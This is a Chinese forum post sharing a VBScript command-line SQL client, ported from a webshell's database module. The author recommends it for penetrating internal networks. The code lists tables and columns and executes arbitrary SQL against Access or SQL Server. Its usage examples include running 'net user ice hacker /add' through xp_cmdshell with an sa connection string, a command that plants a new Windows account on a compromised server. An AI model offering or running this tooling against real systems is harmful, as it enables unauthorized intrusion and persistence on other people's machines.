vbs版的sql查询分析器

  • 发表于
  • 周边

该有的功能都有了
来源:vbs小铺
花了一点时间把以前的海阳顶端2006的sql模块改成vbs版了,和它的功能是一模一样的,不过用起来可能没有asp版的舒 服,不过能用,可以用在dos下了,渗透内网时估计你用得着。

if (lcase(right(wscript.fullname,11))="wscript.exe") then

echo "Execute it under the cmd.exe Plz! Thx."

echo "code by lcx"

wscript.quit

end If

if wscript.arguments.count<1 then

echo "Usage: cscript sql.vbs showTables e:\hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"

echo "usage: cscript sql.vbs query 连接字符串 <表名=default:""""> sql语句 <页数=default:1>"

echo "exp:cscript sql.vbs showTables "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)

echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"select * from name"&chr(34)&Space(1) & 1

echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"update....."&chr(34)&Space(1) & 1

echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&Space(1) & 1

end If

Sub chkErr(Err)

If Err Then

echo "错误: " & Err.Description & "错误源: " & Err.Source & vbcrlf

Err.Clear

wscript.quit

End If

End Sub

Sub echo(str)

wscript.echo str

End Sub

Function fixNull(str)

If IsNull(str) Then

str = " "

End If

fixNull = str

End Function

Sub showErr(str)

Dim i, arrayStr

arrayStr = Split(str, "$$")

echo "出错信息:"&vbcrlf

For i = 0 To UBound(arrayStr)

echo (i + 1) & ". " & arrayStr(i) & "
"

Next

echo vbcrlf

wscript.quit

End Sub

Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Rem 下面是程序模块选择部分

Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

PageMsDataBase()

Sub pageMsDataBase()

Dim theAct, sqlStr

theAct = Wscript.Arguments(0)

sqlStr = Wscript.Arguments(1)

Select Case theAct

Case "showTables"

showTables()

Case "query"

showQuery()

End Select

End Sub

Sub showTables()

Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr

sqlStr = Wscript.Arguments(1)

If LCase(Left(sqlStr, 4)) = "sql:" Then

connStr = Mid(sqlStr, 5)

Else

connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr

End If

Set conn = CreateObject("Adodb.Connection")

conn.Open connStr

chkErr(Err)

tablesStr = getTableList(conn, sqlStr, rsTable)

echo tablesStr & "================================================="

Do Until rsTable.Eof

Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))

echo rsTable("Table_Name") &vbcrlf

Do Until rsColumn.Eof

echo "字段名:" & rsColumn("Column_Name")&vbclrf

echo "类型:" & getDataType(rsColumn("Data_Type")) & vbclrf

echo "大小:" & rsColumn("Character_Maximum_Length") & vbclrf

echo "精度:" & rsColumn("Numeric_Precision") & vbclrf

echo "允许为空:" & rsColumn("Is_Nullable") & vbclrf

echo "默认值:" & rsColumn("Column_Default") & vbclrf&vbclrf

rsColumn.MoveNext

Loop

rsTable.MoveNext

echo vbcrlf

Loop

echo "==============================================================="

conn.Close

Set conn = Nothing

Set rsTable = Nothing

Set rsColumn = Nothing

End Sub

Sub showQuery()

Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable

sqlStr = Wscript.Arguments(1)

theTable = Wscript.Arguments(2)

sql=Wscript.Arguments(3)

page=Wscript.Arguments(4)

If Not IsNumeric(page) or page = "" Then

page = 1

End If

If LCase(Left(sqlStr, 4)) = "sql:" Then

connStr = Mid(sqlStr, 5)

Else

connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr

End If

Set rs = CreateObject("Adodb.RecordSet")

Set conn = CreateObject("Adodb.Connection")

conn.Open connStr

chkErr(Err)

tablesStr = getTableList(conn, sqlStr, rsTable)

echo "数据库表结构查看:"

echo tablesStr & "========================================================"

echo ">SQL命令执行及查看<:"&vbcrlf

If sql <> "" And Left(LCase(sql), 7) = "select " Then

rs.Open sql, conn, 1, 1

chkErr(Err)

rs.PageSize = 20

If Not rs.Eof Then

rs.AbsolutePage = page

End If

If rs.Fields.Count>0 Then

echo "SQL操作 - 执行结果"&vbcrlf

echo "===================="&theTable&"列名如下========================================"

For j = 0 To rs.Fields.Count-1

echo rs.Fields(j).Name & vbcrlf

Next

For i = 1 To 20

If rs.Eof Then

Exit For

End If

For j = 0 To rs.Fields.Count-1

echo fixNull(rs(j))& vbcrlf

Next

rs.MoveNext

Next

End If

echo "================================================================="

echo " 共有"&rs.Fields.Count&"列" & vbcrlf

For i = 1 To rs.PageCount

page=i

Next

echo " 共有" & page & "页"

rs.Close

Else

If sql <> "" Then

conn.Execute(sql)

chkErr(Err)

echo "执行完毕!"&vbcrlf

End If

End If

conn.Close

Set rs = Nothing

Set conn = Nothing

Set rsTable = Nothing

End Sub

Function getDataType(typeId)

Select Case typeId

Case 130

getDataType = "文本"

Case 2

getDataType = "整型"

Case 3

getDataType = "长整型"

Case 7

getDataType = "日期/时间"

Case 5

getDataType = "双精度型"

Case 11

getDataType = "是/否"

Case 128

getDataType = "OLE 对象"

Case Else

getDataType = typeId

End Select

End Function

Function getTableList(conn, sqlStr, rsTable)

Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))

echo "存在以下表名:"

Do Until rsTable.Eof

getTableList = getTableList & "["& rsTable("Table_Name") & "]"&vbcrlf

rsTable.MoveNext

Loop

rsTable.MoveFirst

End Function